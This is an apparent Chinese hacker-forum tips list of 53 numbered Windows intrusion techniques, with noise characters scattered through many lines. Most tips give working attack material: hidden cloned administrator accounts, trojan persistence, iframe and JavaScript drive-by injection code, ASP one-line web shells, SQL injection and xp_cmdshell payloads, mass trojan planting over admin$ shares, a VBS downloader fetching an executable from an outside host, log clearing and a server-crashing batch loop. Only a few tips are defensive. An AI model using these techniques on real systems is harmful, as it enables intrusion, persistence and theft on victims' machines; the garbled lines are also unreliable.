1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,2 H0 S: }/ K* s5 D/ O# U% @
cacls C:\windows\system32 /G hqw20:R+ Y V# Q" L& ]( V1 ]
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* y8 m! J d0 H' i- i恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F6 ]: U( S- h- @ G" K; w3 \
( q# S! Z1 @4 W, ?
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。0 w( k6 q1 q% K, d" F
5 m% m' u+ n- t6 ]' \) H
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。( w1 G9 L8 z; N& ~# H2 u$ M+ N& w
5 |( y2 D0 o. k4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号9 O* \: X* g+ Z/ P- v9 c* A
& k+ C) p; s9 k8 i7 h5、利用INF文件来修改注册表0 n* N$ a- x5 m1 l$ |" ?
[Version]
5 c( d) `( Z5 Y1 S* r) U: sSignature="$CHICAGO$"9 A. X7 B& m+ [ U9 d# I
[Defaultinstall]
+ `6 X3 ~+ ~( ?6 ?! r: WaddREG=Ating
( \( ^# m) v v& N4 T[Ating]9 z Q w: L4 B: T. T; v# J) c
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
4 K' ?) |; A: ^! p以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
# H" M" G+ q! A1 yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径' e9 b6 d- q! _
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- N9 d0 G5 s2 F' J; y$ JHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
6 a' m/ ]( F+ j4 i& JHKEY_CURRENT_CONFIG 简写为 HKCC+ H$ G W i1 U
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值6 v* O. v: l7 r' s" b- X( F
"1"这里代表是写入或删除注册表键值中的具体数据
: Z- W7 H( i) ?* _$ [* s
; |! a0 f& p2 n8 T j; c6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
3 k3 \6 s. C- [' D+ v多了一步就是在防火墙里添加个端口,然后导出其键值
8 Q: P4 K/ T$ T; t: j) K! n[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
: G: [! m1 R, w% t- q) E
2 k8 Z; j: b. s- ~8 z v7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽4 f4 ?7 w& ]) Y/ h; Z, @8 y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
, \# j4 }) M) g8 ]6 ~- x) g8 W1 t* \) `& ?
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. s; L2 ~. V$ i1 p1 H! h1 b
8 w" Z* p) H- @7 j9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
' ?* B6 S* b2 ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。9 I4 N; P1 t5 K
& @" q5 E) v. [, f1 ]. e9 M* @
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”) u0 k5 t9 k1 i/ u! D; d7 v
0 L! o0 L# S3 R$ t
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,8 d1 N2 L: ]3 b4 | `
用法:xsniff –pass –hide –log pass.txt* m* O8 G$ O1 n3 n% E9 g' A% }
4 f0 j! }: H* p9 |% ]5 j( l
12、google搜索的艺术; T' |& w% R+ {( r9 J
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
' Y# T* M8 z) ] _2 x" \* @+ V或“字符串的语法错误”可以找到很多sql注入漏洞。
9 S v9 O( V# f, c" `, ]* L3 y$ `6 o0 M5 R9 z5 |1 J
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- f4 m# a, I4 r
- N2 V) m1 a. v9 [6 i' ~14、cmd中输入 nc –vv –l –p 1987
9 M# E: Y8 }* \% O) v% e( Q做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 U6 j0 e! D( E. F, [6 i3 s
/ E3 H6 U1 A! m. }" }15、制作T++木马,先写个ating.hta文件,内容为
; H' P$ M& e* \5 ^<script language="VBScript">: c2 E; P, K, }, R9 @
set wshshell=createobject ("wscript.shell" )
+ C4 p. x& K' R; ca=wshshell.run("你马的名称",1)
. |" j, Q% c! e; b9 W9 Jwindow.close
) N0 c8 |& P! G/ E</script>3 w6 Q. W/ `; y
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。: `! s( o- w2 `1 Q
+ {0 ]1 w. V9 F4 A; Q
16、搜索栏里输入- ~0 W8 D5 q3 c8 c# k7 Y$ `
关键字%'and 1=1 and '%'='& e* F) R; Z8 m0 y N2 d: n
关键字%'and 1=2 and '%'='/ H ]( @0 T8 U$ c
比较不同处 可以作为注入的特征字符
1 j- f/ w( P8 m# n v
) b B, J4 K' y# p: M# M) t17、挂马代码<html>
+ E7 j+ B5 h7 Z z<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
: g. d# J( E1 K</html>
3 L+ H: N# ^* |1 N. v1 k% b
- F2 C0 i9 R5 u8 Q4 Y R$ W18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
" x, q$ M# r' U6 y7 ~net localgroup administrators还是可以看出Guest是管理员来。: M. t* o, [. {0 r$ B* C/ t/ z
; h8 e7 o8 Q$ k: Q& ~3 G% R19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等 h% q+ Y% v1 k6 T4 H2 Z9 q' X- J- ?
用法: 安装: instsrv.exe 服务名称 路径
% I+ V! M8 d0 O卸载: instsrv.exe 服务名称 REMOVE& {; U# A5 Z& \3 s0 {2 E+ t
; i+ f; A' w" {; z( k9 O4 x9 J/ A2 F, a
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉/ p4 w7 P* d' `7 w
不能注入时要第一时间想到%5c暴库。% T- R7 F0 o/ D7 |
9 P3 ]. E7 c" F22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~# e* e3 T' u: c; }' Z
8 d" f, D( L B/ U* m1 J" Z0 J, q1 [23、缺少xp_cmdshell时
; F2 l5 A+ r- f" n& r0 G2 e& I+ s; Q尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
# b' B& h$ ~2 [, d* Z! g' L假如恢复不成功,可以尝试直接加用户(针对开3389的)" ~5 U2 K! q5 h% ]( ~
declare @o int
3 S: [% G* O! X7 ?2 E2 oexec sp_oacreate 'wscript.shell',@o out" t. c1 a* q& g( E+ M0 `
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员: ]# {6 S- W% M& D8 G
. Z5 ^1 h% S7 Z24.批量种植木马.bat/ o; r' D1 Y: N6 _* t8 f9 ?
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中% Y6 g' H5 `/ r, M; _6 B1 }+ D( j
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间6 v* z- D- R6 M
扫描地址.txt里每个主机名一行 用\\开头
) M% ]! L q9 p
" {1 {1 m' M8 |3 ?5 [4 w7 _4 K25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。4 `% m+ L8 q. @% T( l$ P
4 a! ]+ g$ K, a1 b26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ `, ^7 w7 W# _' x) e将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
) h/ F: _! M; L1 }+ i7 @; i.cer 等后缀的文件夹下都可以运行任何后缀的asp木马; }4 k% c) D$ S2 ?- @& f
: `9 h% H i6 h% f
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP. E$ N7 r o: r7 v/ h; r
然后用#clear logg和#clear line vty *删除日志) [0 `2 B, w' ^; [0 z
: d" R/ {6 A9 A( D1 E28、电脑坏了省去重新安装系统的方法 K5 e- E. B4 I) w4 z `, s
纯dos下执行, \8 ?: v8 x+ K4 u% e
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config4 z Z& q9 J S- S7 V! }* J6 v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
% T8 T7 @& S: m! _1 B+ k. Y0 W( @4 i7 A+ s3 J Q
29、解决TCP/IP筛选 在注册表里有三处,分别是:% d' |0 p3 t2 z R$ g
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
0 ^6 q/ ]) ^* q* }2 oHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
0 }" G- t/ u, tHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; _2 y- n( D; |- h, C3 i5 L9 n分别用
+ G$ {. a4 [1 N/ V- u i. Tregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 I+ v8 i Y! [3 I4 W/ G
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 u! V: T, k" k8 e) [
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
C, H: i5 a* z9 R( x( E3 J. `命令来导出注册表项& r# W) s k1 k4 o0 p; C2 O2 ?( p3 f
然后把三个文件里的EnableSecurityFilters"=dword:00000001,: |% y8 {1 t, T+ J+ v2 p+ J7 D1 H
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用5 k$ {& ~) ~6 D( p# z) b
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
/ S# w E+ h9 W* H; a3 D3 \! I( j7 Q0 n0 Q
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U5 Z3 `# c9 g( {3 f
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
" q; d% G; l0 D, w4 N F& x7 H3 s& n9 `0 e1 U9 d
31、全手工打造开3389工具% @, J# E' s/ b `
打开记事本,编辑内容如下:& g1 q1 L7 t6 I- u- M
echo [Components] > c:\sql
7 b7 d P1 H3 U9 jecho TSEnable = on >> c:\sql ^/ |0 ^1 o, e1 s1 \
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% A; W& z4 f& m) e% F8 T/ H* W: P, N) o# e编辑好后存为BAT文件,上传至肉鸡,执行
* A2 q. f9 T" V* l0 \8 F1 X. B6 C5 e' V; H/ t
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
9 H% d. s, H7 r# u+ u5 f- j5 {3 L; q G
33、让服务器重启/ ^0 M/ o& k# P( M& ]
写个bat死循环:
7 f) e1 i- O& n# ?. N) h( {, U@echo off
& S9 e0 \4 g; z4 `3 r4 {8 O& i:loop1
7 u; U- z' M \% m; z& q3 o) pcls5 f( y3 P2 j9 T
start cmd.exe
8 m0 i# X3 q) h& O1 D$ j' [, tgoto loop1
9 I% H. y' p+ f- e! d6 \+ n保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
/ S5 b. g8 p1 n8 ^/ \5 D4 I1 j
3 S5 \5 \6 C7 a, T7 I/ D. ^34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 w8 p' z, N) T! a3 Y- P@echo off3 p; U* R5 v$ I& q
date /t >c:/3389.txt7 H( J& ]0 t( A" a' W) z9 d
time /t >>c:/3389.txt3 u' I# K R O6 ~' x# p
attrib +s +h c:/3389.bat% P+ ] E2 L* u) F- N
attrib +s +h c:/3389.txt3 ^# C/ n. Q4 O# Q4 A/ |
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt i$ p* M. t y6 _
并保存为3389.bat3 G& Z6 S$ p9 _
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
5 y/ i# [: M& D. O
8 E z, O7 h6 @- X- T* L35、有时候提不了权限的话,试试这个命令,在命令行里输入:, J [8 r/ [, p. z
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)9 g# q" O! C0 K5 Q5 E, o
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
8 o! i9 ~4 I: x! f2 w$ Y8 ]% N7 Y
3 k/ w, j$ q$ N8 d+ }4 \36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
$ f& w. y1 g) a7 w* K- x" U$ y. i9 u6 \echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
9 }7 F' B+ {; D/ S5 O$ u2 {- V9 yecho 你的FTP账号 >>c:\1.bat //输入账号
P( Z3 P k: c5 R$ h$ @' Gecho 你的FTP密码 >>c:\1.bat //输入密码
m3 J: }9 G& X* |8 c! ~5 Eecho bin >>c:\1.bat //登入
6 T/ S% E+ F* S* x+ z# \" Qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么! t# a* D$ w2 w
echo bye >>c:\1.bat //退出
' u" O1 n$ `. g: \然后执行ftp -s:c:\1.bat即可# }. }0 R# W& f4 p j# s1 p
1 E% r, I6 @8 X' g$ ]- R37、修改注册表开3389两法1 o+ k9 L* p4 S( [4 C' e
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表 ^+ ]5 b( U9 f
echo Windows Registry Editor Version 5.00 >>3389.reg2 U* V6 I5 y* ~. }
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 l5 r# f3 g* H" ^1 D
echo "Enabled"="0" >>3389.reg( H B$ n# A/ K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows! ^- j, e% Y) O1 A; c: C
NT\CurrentVersion\Winlogon] >>3389.reg7 V1 [' ?# J0 K5 f
echo "ShutdownWithoutLogon"="0" >>3389.reg
A+ X0 @9 H- Q. Fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
; L( M p7 q) C& U- b9 u x>>3389.reg
2 K" b k2 _. ~! X9 C: R3 vecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
9 ?7 m+ ^3 U8 ^) ?- f' aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]: B4 M0 I; J0 H# g2 h0 L) j
>>3389.reg) `4 M! V6 ]# u0 g5 _
echo "TSEnabled"=dword:00000001 >>3389.reg
6 d; E$ ^: f2 \0 jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg) B1 @" {! v( G" o h& a/ c' ]
echo "Start"=dword:00000002 >>3389.reg! f" Q) n7 ?% _+ {; d. ]0 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
5 Q) S0 Y! _3 m$ y+ q3 k>>3389.reg
9 w1 P" B- w3 g3 H1 R( t0 ~echo "Start"=dword:00000002 >>3389.reg5 j2 {; ]. \* Q$ q# a% s
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg( ]& ]6 L: m# {
echo "Hotkey"="1" >>3389.reg* l) w+ E7 c% r* r X) x2 Q, d R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' w( q4 f; L4 [: D8 V* f
Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 V! j/ U9 s* F; R7 Z
echo "PortNumber"=dword:00000D3D >>3389.reg
_. q; W$ v1 b/ h! Q4 v+ \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& o' G: N$ ]! h
Server\WinStations\RDP-Tcp] >>3389.reg
6 B; o0 G6 v/ u4 e( u. E5 _echo "PortNumber"=dword:00000D3D >>3389.reg
) O1 \0 g G, S$ T6 W) k( g2 ?把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。, W% [$ z6 v/ L9 g8 z
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
1 e, O F3 O) k; K" x因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 T6 c: p- @5 o, T5 W- X7 u6 ^$ v F2 W
(2)winxp和win2003终端开启/ i! P/ F* U E9 m3 v) q+ p
用以下ECHO代码写一个REG文件:
% O3 y8 C9 q. Xecho Windows Registry Editor Version 5.00>>3389.reg! M: v4 [; X. X' n" L+ Y* {, V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* F# a" X8 ~4 u
Server]>>3389.reg2 Q% f; }! J; C8 N/ q
echo "fDenyTSConnections"=dword:00000000>>3389.reg
- c( A5 i. V" [; _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' F: T D5 f T7 m* ^) J
Server\Wds\rdpwd\Tds\tcp]>>3389.reg0 h. Q9 x3 B+ k! ~. f- c
echo "PortNumber"=dword:00000d3d>>3389.reg
- K5 |* U7 g( lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" f V- ?. D& z7 E3 }
Server\WinStations\RDP-Tcp]>>3389.reg
; u# X: ^1 l- q7 decho "PortNumber"=dword:00000d3d>>3389.reg
% g" F# e* _0 ^+ T+ }6 C然后regedit /s 3389.reg del 3389.reg: m1 x z; t, h0 g
XP下不论开终端还是改终端端口都不需重启3 E* k# v1 e' i
( |0 O k( v$ F k
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃* \; ]7 _( e0 z& q$ A
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'/ u1 ?6 _7 j/ A4 K& S0 N/ N6 X
7 G+ K/ f; K G( G# K; g7 `
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!& p6 Z4 B! o; r' S9 d9 j% z: C$ c
(1)数据库文件名应复杂并要有特殊字符- n$ c' U, m6 S- C6 \0 Q- q) C1 K) d
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源$ o& {9 Y: v, M9 R& ] T) x
将conn.asp文档中的
# L& p1 U) t1 {! D- {, W0 w8 ?DBPath = Server.MapPath("数据库.mdb")8 a/ T, Q) W& ]: ~1 D: L
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath2 s8 L' X w F
2 }- d& M- b5 \' G& Z' D6 e
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置3 [' Y0 p1 ?, B# J8 c
(3)不放在WEB目录里
/ Z7 l! h2 e2 `
+ ?% X/ D! V! O# L1 P40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉) R1 G/ B2 \2 ]4 J" I5 ]% `4 `
可以写两个bat文件. L* Q0 N$ P: {& q4 k% G
@echo off
; W" b% _" H2 Q" b@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe4 a B! B1 J8 e4 L5 d
@del c:\winnt\system32\query.exe4 H1 G* {6 M' b0 w7 N5 U+ p! g9 U% ]
@del %SYSTEMROOT%\system32\dllcache\query.exe
- s1 g- w" C |; `@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的# `# j) R9 K8 s7 @& O+ j0 `
: v% n/ z# j2 P& i6 l@echo off8 v! E* }4 Y6 B7 r# C8 C- ^
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe# q! W/ ]9 N7 J) V- j. i
@del c:\winnt\system32\tsadmin.exe$ W3 S4 }5 P4 b/ Q
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
+ o" |, u3 E* o0 ]! p# U
: L1 ~! Y; `' G; D& w- u) l41、映射对方盘符( d7 c: s2 y, Y
telnet到他的机器上,
, M5 `; Y" _! tnet share 查看有没有默认共享 如果没有,那么就接着运行+ Z+ M6 |/ ]& @( H4 Y* j7 A
net share c$=c:
/ d5 O( A4 e N0 r0 Q9 u$ J5 `: Hnet share现在有c$3 ?8 v( `- Y! m- w" l
在自己的机器上运行6 z5 [+ E) ^* w& d9 l! h1 t, w* N
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ T f. i7 K! X# G$ d- ~( _* Z6 Y& J- y
) g# y, @' A' u' p8 i42、一些很有用的老知识) o |# A5 l" ?; T8 K
type c:\boot.ini ( 查看系统版本 )
% }) T" n% e; \3 `net start (查看已经启动的服务); X- D9 J [ _* |) G( ]7 e& ?, \( ?
query user ( 查看当前终端连接 )+ ^3 \2 U- @$ l+ r
net user ( 查看当前用户 )
& ^# W+ i$ N f' G' ~5 Fnet user 用户 密码/add ( 建立账号 )
- |! N; N# K" Q$ Gnet localgroup administrators 用户 /add (提升某用户为管理员)7 \7 s7 _3 e I+ d* T
ipconfig -all ( 查看IP什么的 )' W7 O9 T! H8 P: ]9 A& t! g* _) \) U
netstat -an ( 查看当前网络状态 ), M$ S4 F$ g4 W4 G
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)$ ]; X) \1 ~, z+ {5 q# u
克隆时Administrator对应1F4: i( Y( D: F! w' }! X" B$ g+ O
guest对应1F5
( ~. e1 s8 {# X! ^( Dtsinternetuser对应3E86 J3 P) T6 G% z7 L8 {
: o4 y% d; ]7 E5 U7 m6 z: j43、如果对方没开3389,但是装了Remote Administrator Service
; W8 U8 Q1 b6 v( _; L用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接* G; v+ W3 ?" {& e4 G
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息7 h, w. L: G( K- j, F3 T* ]
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
8 ?) `# m- s# {8 N' |# H! ?/ k0 p5 c4 N& [
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
& C. n' `5 m0 J$ `8 H本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)! ?3 ?9 q& ^ H) s+ I5 u0 ]( k
$ n7 y' Y) y( ?' H
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- G- Z* `4 `$ {) M+ \echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 V! d" _0 h4 b5 ] r9 N& l0 b
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 T% \7 u# }# l% W& f4 H( |4 rCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
- V0 f5 L1 M! d* A2 T' ~1 Y1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
3 t8 e Q2 K& C+ q# q; S(这是完整的一句话,其中没有换行符)
. C5 O# W) R& V) t( h然后下载:
7 v& O- e$ d- t5 ?cscript down.vbs http://www.hack520.org/hack.exe hack.exe( N" }3 l& S0 R- I" G8 w! h; k$ R
2 k# B- K* ^4 \8 N, D" ?8 V" T46、一句话木马成功依赖于两个条件:
# d% L4 F& N5 R& H+ r/ ]: v1、服务端没有禁止adodb.Stream或FSO组件
! k+ K) D* l4 z" o9 S8 K) _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
- x( V) c5 S* k5 v3 `) a
. z( ?) Y2 e9 v) i6 o47、利用DB_OWNER权限进行手工备份一句话木马的代码:
+ n& x9 J9 d2 n0 y8 q& W' w8 p;alter database utsz set RECOVERY FULL--# u; V% e- l( K+ ^
;create table cmd (a image)--
, L- | h) `5 i" U1 R: v1 b;backup log utsz to disk = 'D:\cmd' with init--
( O9 L6 p+ M) a8 f;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--5 s- |5 M+ s$ I* g# G
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
* X% M8 C2 l) K& F' Q* R注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
- i4 i$ d" H) j* k1 K- T, R
4 G" g+ n+ T+ G) M48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
3 ^8 @1 f" f' c; L+ \- ]: w% Q
: o! _) i# H$ x用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options, r, V* H( W/ p8 L* M# ~
所有会话用 'all'。
: w% \/ P$ B4 a$ _-s sessionid 列出会话的信息。9 V f) p5 t! W3 C+ w
-k sessionid 终止会话。( R1 n8 y5 n8 t6 |" [2 {
-m sessionid 发送消息到会话。/ q, R1 x% J- k/ r2 q
G- u% W# P: v- p- Econfig 配置 telnet 服务器参数。7 _* J u) [0 y. _: H
7 T$ r& ^" J# R
common_options 为:- D) h4 D* R) }- L. K2 v
-u user 指定要使用其凭据的用户
5 u, e9 s+ X, C! d. \-p password 用户密码$ X! P& ~7 A: T' m
9 r- @5 c! D% U4 W0 d
config_options 为:3 g$ P- v! P( l
dom = domain 设定用户的默认域, a' k; Z4 w8 w
ctrlakeymap = yes|no 设定 ALT 键的映射4 P O( n. U1 s/ q% s9 r: @0 E
timeout = hh:mm:ss 设定空闲会话超时值9 [8 X" R4 ]9 t5 V" k9 f
timeoutactive = yes|no 启用空闲会话。7 y# ^/ d7 A. m# w& Z; x
maxfail = attempts 设定断开前失败的登录企图数。
1 f' o g4 u3 Q" G3 O5 {maxconn = connections 设定最大连接数。
5 w6 X2 u$ A! }: fport = number 设定 telnet 端口。$ h% P" a; r7 Z, h9 k
sec = [+/-]NTLM [+/-]passwd
# ]+ N" c& S7 U# ^( _8 u! C设定身份验证机构( A6 \& w. q" `
fname = file 指定审计文件名。0 W2 h) b% i. ]. t
fsize = size 指定审计文件的最大尺寸(MB)。
! |% g& m9 b; L. wmode = console|stream 指定操作模式。7 x6 c" B8 E3 K4 r8 r
auditlocation = eventlog|file|both
0 w* V1 E5 ?$ V0 H9 \0 C$ L指定记录地点; V, j, o R4 N Q5 q4 h0 f7 E
audit = [+/-]user [+/-]fail [+/-]admin
# n$ g( t! {2 j* s+ W/ j+ y/ \% W$ t. N8 h: G9 A% D5 ~
49、例如:在IE上访问:
$ ?4 l: f7 C) {www.hack520.org/hack.txt就会跳转到http://www.hack520.org/& B9 r) i1 a0 K! g K7 q
hack.txt里面的代码是:
, j$ L3 g; R$ e* C<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
% M) w# h S: W% } q! q4 R3 _把这个hack.txt发到你空间就可以了!6 p% }- [/ t, R
这个可以利用来做网马哦!4 J8 `% W5 m ^3 O
; ?" W) {* }% |7 e5 D$ {% b2 u
50、autorun的病毒可以通过手动限制!1 V0 ^$ g! ~0 `/ ?
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
3 m. G: h9 R1 U1 j8 N C, s7 H5 J3 ~2,打开盘符用右键打开!切忌双击盘符~0 L5 G- I3 w8 z+ e
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
( r2 V* i0 @! ], s/ z
( r. v' S7 j: o& b8 h1 O ?51、log备份时的一句话木马:
+ ^( `: v, l e/ Ia).<%%25Execute(request("go"))%%25>% t6 c! C; f z5 l6 C+ a
b).<%Execute(request("go"))%>! N( I( E4 w; g; j m% ?* {+ Y
c).%><%execute request("go")%><%
; C5 B$ f$ {3 o2 y5 B# z9 Md).<script language=VBScript runat=server>execute request("sb")</Script>
$ G6 q8 v! x; G- x& se).<%25Execute(request("l"))%25>1 d& G" ]7 J8 s3 u1 V
f).<%if request("cmd")<>"" then execute request("pass")%>
) A' N- Z' {2 z( P% A; J h' ^6 `
52、at "12:17" /interactive cmd
7 {% w9 ^1 r: N$ C$ ?执行后可以用AT命令查看新加的任务, m2 X \9 w6 P
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 d/ u& R4 q' E; d
: i$ n2 a0 J R0 h
53、隐藏ASP后门的两种方法
